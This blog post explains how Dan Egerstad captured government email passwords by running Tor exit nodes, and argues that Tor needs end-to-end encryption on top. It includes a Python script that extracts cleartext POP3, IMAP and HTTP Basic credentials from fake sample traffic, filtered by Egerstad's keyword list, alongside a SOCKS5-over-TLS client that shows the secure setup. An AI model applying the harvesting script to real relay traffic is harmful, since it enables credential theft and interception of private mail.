Ars Technica is reporting that a security specialist was able to grab a bunch of login/passwords after running Tor nodes to illustrate proper and improper use of the widely-used anonymity network. In this particular case, Dan Egerstad volunteered to be part of the Tor network by running “exit nodes,” and boy did he grab a bunch of sensitive logins and passwords.
Particularly embarrassing is the fact that the list showed embassy staff of Uzbekistan, Kazakhstan, Iran and India, among others, using Tor to reach their mail accounts. There seems to be no explanation other than the IT departments of these governments actually recommending Tor as standard operating procedure for accessing their accounts from abroad.
That’s not an appropriate use for Tor at all.
When this story broke in India, one of the news outlets tested the username/password to get into the account of a government official (which is of questionable journalistic ethics):
To check the authenticity, The Indian Express sent a test mail to the Indian Ambassador in China on her official email ID and, using the password posted online, was able to access it. The email account of the Indian Ambassador to China contained details of a visit by Rajya Sabha member Arjun Sengupta to Beijing earlier this month for an ILO conference. There was also a transcript of a meeting this evening which a senior Indian official had with the Chinese Foreign Minister.
Also on this list of shame were Hong Kong political parties and Legislative Council members. Being a former resident of HK, this is particularly bizarre since the HK government has prided itself on being IT savvy on the world stage, even bragging about being the first in the world to use E-certificates on the Smart-ID cards all Hong Kongers carry. It’s ironic the E-cert system is so secure, complex and unusable in HK, while politicians are using cleartext mail protocols and sending data through random untrusted computers.
Egerstad has taken special attention to HK (SCMP, Sep 9, 2007, subscription):
Swedish computer security consultant Dan Egerstad hopes to come to Hong Kong next month and visit some of the legislators and NGOs he exposed on his website as having weak internet security – but only if the police promise not to arrest him at the airport.
Mr Egerstad, 21, published the e-mail passwords of prominent legislators such as the Democratic Party’s Sin Chung-kai and Liberal Party vice-chairman Miriam Lau Kin-yee on the website dErangedsecurity.com. He also published the IP addresses of the e-mail servers.
Mr Egerstad trawled through the e-mails of the One Country Two Systems Research Institute of China and the Liaison Office of the Dalai Lama for Japan and East Asia, as well as the Hong Kong Human Rights Monitor.
How Tor Works
A quick recap: Tor is a volunteer network of computers (relays) that offer to carry your TCP traffic, encrypted and anonymously, through the Tor network. The Tor client on your machine picks a path of three relays and wraps your traffic in three layers of encryption, one per relay. Each relay peels off its own layer and learns only the previous and next hop: the first (entry) relay sees your IP address but not your destination, the last (exit) relay sees the destination but not your IP, and the middle relay sees neither. No single relay knows both who you are and where the traffic is going. There are some really smart people behind Tor like Roger Dingledine, and most experts agree that for anonymity, it does a very good job.
The problem is, people are using Tor without understanding exactly what it does and does not provide.
The weak link is when a user’s data finally emerges at the last computer (the exit node), which relays the request to the public Internet. Whoever operates that exit node can see what you’re sending and receiving, and can tamper with it too. So while Tor provides end-user anonymity at the network/packet level (it hides your IP address), it does not provide end-to-end data secrecy. The traffic coming off the exit node on your behalf is exactly the protocol and data your application (Web browser, mail program, instant messenger, etc.) sent out.
If it’s a cleartext data stream like HTTP or mail (IMAP, POP3 or SMTP without TLS), then anyone running a Tor exit node can see and capture it, usernames and passwords included. And that’s what Egerstad did: he monitored his exit nodes for:
“gov, government, embassy, military, war, terrorism, passport, visa” as well as domains belonging to governments.
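To make the point concrete, here is an added example (not Egerstad’s code, and not anything from the Tor project) of the kind of passive filter an exit-node operator could run over the traffic leaving the relay. The “captured” streams are constructed byte strings standing in for application payloads; the hostnames and credentials are made up. Cleartext POP3, IMAP and HTTP Basic logins fall out trivially, while an IMAPS stream to the very same mail server yields nothing, because the exit only ever sees TLS records.

```python
"""What a Tor exit-node operator can read off cleartext traffic.

Added example for this post; it is not Egerstad's code or anything from the
Tor project. The "captured" streams are constructed byte strings standing in
for application payloads as they leave an exit relay towards the destination.
"""
import base64
import re

# Egerstad's published watch list, applied to the destination hostname.
KEYWORDS = ("gov", "government", "embassy", "military", "war",
            "terrorism", "passport", "visa")

# Constructed samples: (destination host, port, client -> server bytes).
# Hostnames are made up; the credentials are fake.
CAPTURED_STREAMS = [
    ("mail.embassy.example.gov", 110,                      # POP3 in the clear
     b"USER ambassador\r\nPASS Tr0ub4dor&3\r\nSTAT\r\n"),
    ("imap.visa-section.example.kz", 143,                  # IMAP in the clear
     b"a001 CAPABILITY\r\n"
     b"a002 LOGIN visa.section \"s3cret pass\"\r\n"
     b"a003 SELECT INBOX\r\n"),
    ("intranet.example.org", 80,                           # HTTP Basic auth
     b"GET /webmail/ HTTP/1.1\r\nHost: intranet.example.org\r\n"
     b"Authorization: Basic " + base64.b64encode(b"hk.legco:p@ssw0rd")
     + b"\r\n\r\n"),
    ("scores.example.net", 80,                             # harmless browsing
     b"GET /scores HTTP/1.1\r\nHost: scores.example.net\r\n\r\n"),
    ("mail.embassy.example.gov", 993,                      # IMAPS: TLS records
     b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + bytes(range(32))),
]

POP3_USER = re.compile(rb"^USER (\S+)\r?$", re.M)
POP3_PASS = re.compile(rb"^PASS (.+?)\r?$", re.M)
IMAP_LOGIN = re.compile(rb"^\S+ LOGIN (\S+) (?:\"([^\"]*)\"|(\S+))\r?$", re.M)
HTTP_BASIC = re.compile(rb"^Authorization: Basic ([A-Za-z0-9+/=]+)\r?$",
                        re.M | re.I)


def is_tls(payload: bytes) -> bool:
    """TLS record header: content type 0x16 (handshake), major version 3."""
    return len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03


def interesting(host: str) -> bool:
    """Egerstad's filter: does the destination look government-related?"""
    h = host.lower()
    return any(k in h for k in KEYWORDS)


def extract_credentials(host, port, payload):
    """Return (protocol, username, password) or None.

    Only cleartext protocols yield anything; a TLS stream is opaque to the
    exit even though it passes through the very same relay."""
    if is_tls(payload):
        return None
    m_user, m_pass = POP3_USER.search(payload), POP3_PASS.search(payload)
    if m_user and m_pass:
        return ("pop3", m_user.group(1).decode(), m_pass.group(1).decode())
    m = IMAP_LOGIN.search(payload)
    if m:
        pw = m.group(2) if m.group(2) is not None else m.group(3)
        return ("imap", m.group(1).decode(), pw.decode())
    m = HTTP_BASIC.search(payload)
    if m:
        try:
            user, _, pw = base64.b64decode(m.group(1)).decode().partition(":")
        except (ValueError, UnicodeDecodeError):
            return None
        return ("http-basic", user, pw)
    return None


def harvest(streams):
    """Run the extractor over every stream; flag government-looking hosts."""
    found = []
    for host, port, payload in streams:
        creds = extract_credentials(host, port, payload)
        if creds is None:
            continue
        proto, user, pw = creds
        found.append({"host": host, "port": port, "proto": proto,
                      "user": user, "password": pw, "flagged": interesting(host)})
    return found


if __name__ == "__main__":
    for hit in harvest(CAPTURED_STREAMS):
        print(hit)
```

Note that the exit operator needs no exploit and no special position beyond running a relay: the plaintext is simply what the client asked Tor to deliver. The one stream the script cannot read is the one where the client used TLS end to end.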
Tor receives your application’s connections through a local SOCKS proxy. SOCKS has been around a long time and is a solid, generic protocol: it tunnels TCP connections without caring what application protocol runs inside, so it carries plain HTTP just as happily as an HTTPS or other TLS-protected session. So if you use Tor, combine it with a secure protocol if you need data secrecy! This is where people get confused: data is encrypted within the Tor network, but it exits the Tor network exactly as your browser or application requested it, most likely unencrypted. So use an end-to-end encryption solution in addition to Tor, if that’s what you need.
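As an added example of doing it right (my code, not the Tor project’s), the following walks through the SOCKS5 exchange with a local Tor client and then runs TLS inside the resulting circuit. It assumes Tor is listening on 127.0.0.1:9050, Tor’s default SocksPort, and that the destination speaks HTTPS; the byte-building and parsing helpers run offline, and only fetch_over_tor() touches the network. Two details matter: the CONNECT request carries the hostname (ATYP 0x03) so the exit does the DNS lookup rather than your local resolver, and the TLS handshake verifies the server certificate against the hostname, so the exit operator cannot quietly substitute his own.

```python
"""Reach an HTTPS server through Tor's SOCKS5 port with TLS inside the circuit.

Added example for this post, not code from the Tor project. It assumes a Tor
client on 127.0.0.1:9050 (Tor's default SocksPort) and an HTTPS server at the
destination; the byte-building helpers work offline, only fetch_over_tor()
touches the network.
"""
import socket
import ssl
import struct

TOR_SOCKS = ("127.0.0.1", 9050)   # assumed: default Tor SocksPort


def socks5_greeting() -> bytes:
    """VER=5, one method offered: 0x00 (no authentication), which Tor accepts."""
    return b"\x05\x01\x00"


def socks5_connect_request(host: str, port: int) -> bytes:
    """CONNECT (CMD=1) using ATYP=0x03, a domain name, not an IP address.

    Sending the name lets the Tor exit do the DNS lookup. Resolving it locally
    first and sending the IP would leak the destination to your own resolver."""
    name = host.encode("idna")
    if not 0 < len(name) < 256:
        raise ValueError("hostname does not fit in a SOCKS5 domain field")
    return b"\x05\x01\x00\x03" + bytes([len(name)]) + name + struct.pack("!H", port)


def parse_socks5_reply(data: bytes) -> int:
    """Return REP from VER REP RSV ATYP BND.ADDR BND.PORT (0 means succeeded)."""
    if len(data) < 4 or data[0] != 0x05:
        raise ValueError("not a SOCKS5 reply")
    return data[1]


def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection")
        buf += chunk
    return buf


def recv_socks5_reply(sock: socket.socket) -> bytes:
    """Read one full reply; BND.ADDR length depends on ATYP."""
    head = recv_exact(sock, 4)
    atyp = head[3]
    if atyp == 0x01:                       # IPv4
        rest = recv_exact(sock, 4 + 2)
    elif atyp == 0x04:                     # IPv6
        rest = recv_exact(sock, 16 + 2)
    elif atyp == 0x03:                     # domain name
        length = recv_exact(sock, 1)
        rest = length + recv_exact(sock, length[0] + 2)
    else:
        raise ValueError("unknown ATYP in SOCKS5 reply")
    return head + rest


def fetch_over_tor(host: str, path: str = "/", port: int = 443) -> str:
    """Open a circuit to host:port via Tor, then run TLS end to end inside it.

    The exit relay forwards TLS records it cannot read. Connecting to port 80
    with plain http:// through the same tunnel would hand it the request."""
    with socket.create_connection(TOR_SOCKS, timeout=60) as raw:
        raw.sendall(socks5_greeting())
        if recv_exact(raw, 2) != b"\x05\x00":
            raise ConnectionError("Tor did not accept no-auth SOCKS5")
        raw.sendall(socks5_connect_request(host, port))
        rep = parse_socks5_reply(recv_socks5_reply(raw))
        if rep != 0:
            raise ConnectionError(f"SOCKS5 CONNECT failed, REP={rep}")
        ctx = ssl.create_default_context()     # verifies the server certificate
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
            status = b""
            while b"\r\n" not in status:
                chunk = tls.recv(4096)
                if not chunk:
                    break
                status += chunk
    return status.split(b"\r\n", 1)[0].decode(errors="replace")


if __name__ == "__main__":
    # Needs a running Tor client on TOR_SOCKS; prints the HTTP status line.
    print(fetch_over_tor("check.torproject.org"))
```

The same tunnel with port 80 and a plain GET is exactly the situation the embassies were in: Tor delivers the bytes faithfully, and the exit operator reads them. The difference is entirely in what the application wraps around its own traffic.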
If you’re surfing CNN or ESPN to get the latest sports scores, no problem. If you’re logging into a system or sending/receiving e-mail, you better make sure it’s encrypted.
Tor has also been in the news related to a phishing/trojan scheme, where spam email asked folks to download Tor, but it really pointed to a trojan program instead.
It’s important to note that in both instances Tor itself is not at fault. The trojan problem is your typical phishing problem — never click on any hyperlink ever sent to you in email, and don’t trust any sites you didn’t find or search yourself.
Tor is a great program, but it’s not a cure-all. You need a wide spectrum of tools to do it right, or you can also do what many corporations do — require the use of a Virtual Private Network, and all your data packets are routed and encrypted back to a trusted corporate home base.
Egerstad had this final harsh warning on his blog:
These governments told their users to use ToR, a software that sends all your traffic through not one but three other servers that you know absolutely nothing about. Yes, two are getting encrypted traffic but that last exit node is not. There are hundreds of thousands of ToR users but finding these kinds of accounts was… hmm… shocking! The person who wrote the security policy on these accounts should reconsider changing profession, start cleaning toilets! These administrators are responsible for giving away their own countries’ secrets to foreigners. I can’t call it a mistake, this is pure stupidity and not forgivable!
ToR isn’t the problem, just use it for what it’s made for.
Tor is very good for anonymity, but it adds no data security of its own. In fact, it is likely more risky than a direct connection, because you are handing cleartext traffic to a stranger (the exit node operator).
I don’t use Tor much, as I don’t often need anonymity. It’s also a sluggish performer because of the three relays for traffic. But when I do use it, I make sure to use Firefox with a virgin clean profile — no cookies, no stored data, no caching, no browsing history. (You can configure Firefox to ask which profile you want on startup.)
So the big headline? This is not a Tor insecurity. You wouldn’t complain to Home Depot that masking tape failed to seal your PVC pipes. You have to use the right tool for the right job, and the Uzbek government is learning this the hard way.